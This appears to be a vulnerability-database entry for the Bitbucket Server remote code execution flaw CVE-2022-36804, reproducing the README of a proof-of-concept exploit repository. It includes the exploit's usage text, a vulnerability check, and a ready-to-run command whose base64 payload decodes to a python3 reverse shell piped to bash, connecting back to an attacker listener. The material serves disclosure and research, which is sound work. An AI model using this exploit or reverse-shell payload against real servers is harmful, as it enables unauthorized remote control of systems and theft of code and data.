Related vulnerability
Title:
Atlassian Bitbucket Server security vulnerability
(CVE-2022-36804)
Description: Atlassian Bitbucket Server is a Git code-hosting solution from the Australian company Atlassian. It manages and reviews code and offers features such as diff views, JIRA integration and build integration. Atlassian Bitbucket Server and Data Center contain a security vulnerability that allows a remote attacker with read permission on a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. The following products and versions are affected: 7.0.0 up to (but not including) 7.6.17, 7.7.0 up to (but not including) 7.17.10, 7.18.0
Description
A real exploit for BitBucket RCE CVE-2022-36804
Introduction
# CVE-2022-36804 PoC
This repo contains a simple proof of concept exploit for the recent [BitBucket remote code execution vulnerability (CVE-2022-36804)](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html). Exploitation of this vulnerability requires read access to a repository on the target instance; if you don't have credentials, the target will need to have at least one public repository.
# Usage
```
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable
```
# Examples
## Checking if an instance is vulnerable
To check whether an instance is vulnerable without executing a command on it, run the following:
```
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check
```
## Establishing a reverse shell
The command below can be used to establish a reverse shell on the victim. The base64 payload decodes to a `python3` reverse-shell one-liner that connects back to `192.168.67.3:8888`, so it will need to be regenerated with your own listener's address and port:
```
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"
```
# Credits
- [TheGrandPew](https://github.com/TheGrandPew) - Identifying and reporting the bug
### Disclaimer
This exploit is for educational/research purposes, I am not responsible for how people will use it. Be nice :)
File snapshot
[4.0K] /data/pocs/635c2f464fd94de2691117c93c81a8e6beeaea95
├── [4.6K] exploit.py
└── [2.5K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.